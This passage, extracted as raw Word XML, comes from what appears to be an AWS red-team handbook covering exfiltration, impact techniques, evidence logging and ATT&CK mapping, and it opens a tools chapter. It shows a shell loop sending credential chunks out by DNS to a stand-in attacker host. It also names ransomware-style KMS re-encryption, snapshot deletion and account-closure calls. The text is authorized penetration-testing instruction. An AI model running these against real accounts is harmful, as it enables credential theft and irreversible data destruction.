      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@ec2-in-victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> $(seq 0 63 ${#CRED}); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED752F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    CHUNK=${CRED:$i:63}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B55368" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> +short ${CHUNK}.exf.attacker.example.com A &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D939F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625289C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.4  The large-bulk exfil playbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93A71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When the target is a multi-terabyte data set (a Redshift warehouse, a data-lake S3 prefix, an Aurora cluster), the bandwidth-free option is almost always a service-side primitive. Redshift UNLOAD to an attacker S3 bucket; Athena CTAS to an external table; S3 cross-account replication; EBS snapshot sharing. The only consideration is destination accessibility: does the attacker have an AWS account whose S3 bucket can receive writes from the target's IAM role? This is where pre-engagement infrastructure matter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s. An attacker who has stood up, ahead of the engagement, an AWS account with appropriate bucket policies and KMS key policies can complete the exfil in minutes; an attacker who starts building that infrastructure mid-engagement is building it while under observation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DDC99" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.5  Impact primitives (authorized only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308498B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Impact demonstrations must be explicitly scoped in the rules of engagement. The canonical impact primitives in AWS are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4B5F2"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Data encryption / ransomware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using a customer-controlled KMS key to re-encrypt S3 objects, RDS snapshots, or EBS snapshots such that the victim cannot read them without the attacker's cooperation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--server-side-encryption aws:kms --ssekms-key-id &lt;attacker-key&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, or copying snapshots to a new KMS key and deleting the originals, are the canonical patterns. The Scattered Spider / UNC3944 intrusions of 2023-2024 publicized this class against Okta-adjacent AWS environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624E799"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Snapshot and backup deletion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:DeleteSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds:DeleteDBSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>backup:DeleteRecoveryPoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. This is destructive and irreversible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5948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Root account lockout.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Changing the root account's email address (requires root credentials, rarely achievable), or disabling MFA on the root and changing the password — both are reported to the defender through billing alerts and should be excluded from most engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFBE82"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Account suspension.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:CloseAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> closes a member account in an Organization. The account cannot be re-opened by the customer alone; AWS Support intervention is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C554B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="512691311"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Warning: authorization scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D116CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="512691311"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact primitives — especially </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DeleteDBSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DeleteSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloseAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and bulk KMS re-encryption — must be explicitly authorized in writing in the rules of engagement. Even with authorization, the authors' practice is to use a designated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>demonstration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> bucket / instance / snapshot rather than exercise the primitive against production objects. A client who asks for "prove you could ransomware us" can be satisfied by demonstrating the primitive against a small dataset the operator has been given permission to encrypt; they should not be satisfied by discovering their production data encrypted at 3am.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864C0B7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.6  Exfiltration evidence trail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C420B3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From a report-writing perspective, every exfiltration step must produce verifiable evidence: the CloudTrail event id, the service-side artifact (snapshot id, export task id), the destination (bucket name, object keys), and a hash of any data moved. The operator should record these continuously during the engagement, not reconstruct them afterwards. A single-file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> that each operational script appends to — one line per material action, with a timestamp, an action type, the target ARN, and a human description — is the minimum discipline. The final report (Chapter 20) reads this file to produce the timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB4210F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.7  MITRE ATT&amp;CK alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564F03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Exfiltration maps to ATT&amp;CK TA0010 with two cloud sub-techniques worth calling out explicitly: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Transfer Data to Cloud Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1537), which covers every service-side primitive; and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Exfiltration Over Web Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1567), which covers Lambda-to-internet and DNS-based channels. Impact maps to TA0040 with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Data Destruction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1485), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Data Encrypted for Impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1486), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Account Access Removal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1531), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Resource Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(T1496) as the most common sub-techniques. Mapping findings explicitly to ATT&amp;CK sub-technique IDs in the report makes them easier for the defender's detection team to integrate into their ATT&amp;CK-aligned coverage tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60A841" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63238EAB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Exfiltration primitives are either service-side (quietest), service-to-internet (loudest), or out-of-band (most variable); prefer service-side for bulk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662513C8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Secrets Manager and Parameter Store reads are high-severity events in mature pipelines; target specific secrets and operate from the secret's normal consumer role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774BB72" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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DNS exfiltration from inside a VPC remains viable because Route 53 Resolver Query Logging is off by default in most organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447CB73" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Large-bulk exfiltration through service-side primitives requires pre-staged destination infrastructure; build it before the engagement, not during.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154B5C0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Impact primitives must be explicitly authorized and demonstrated against scoped demonstration objects, not production objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD385A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Continuous evidence capture (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) during the engagement is the minimum discipline for a defensible report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7B7F9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part VI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59BF26" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Tooling, Supply-Chain, and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006D9AB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The last three chapters shift from attack theory to operational craft. Chapter 18 inventories the tools the practicing AWS red-team operator relies on — the ones referenced throughout this book, plus newer additions — with opinionated guidance on when each matters. Chapter 19 walks the CI/CD and software supply-chain attack surface: GitHub Actions OIDC, Terraform state abuse, dependency-confusion against Lambda builds, and IaC pipeline injection, which have become dominant entry vectors in 2024-2026. Chapte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>r 20 closes the loop with report-writing, detection engineering, and remediation guidance — the practitioner's deliverables, not attack primitives. The book is not complete without this last chapter: an engagement that produces access but not a usable report produces very little lasting value for the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D925D4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>The Operator's Toolbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CEC0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mature AWS engagement uses a small number of tools intensively rather than a large number of tools superficially. This chapter inventories the tools referenced throughout the book, plus a handful not yet introduced, and describes when each one earns a place on the engagement laptop. The lineup evolves year by year; the categorization below reflects the landscape as of 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134821B0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>18.1  Enumeration and reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51411F8C"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CloudFox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">A Bishop Fox project. For the practicing operator, CloudFox is the highest-leverage single tool on the engagement. Its subcommands collapse what would otherwise be dozens of individual AWS API calls into operator-useful summaries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>inventory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
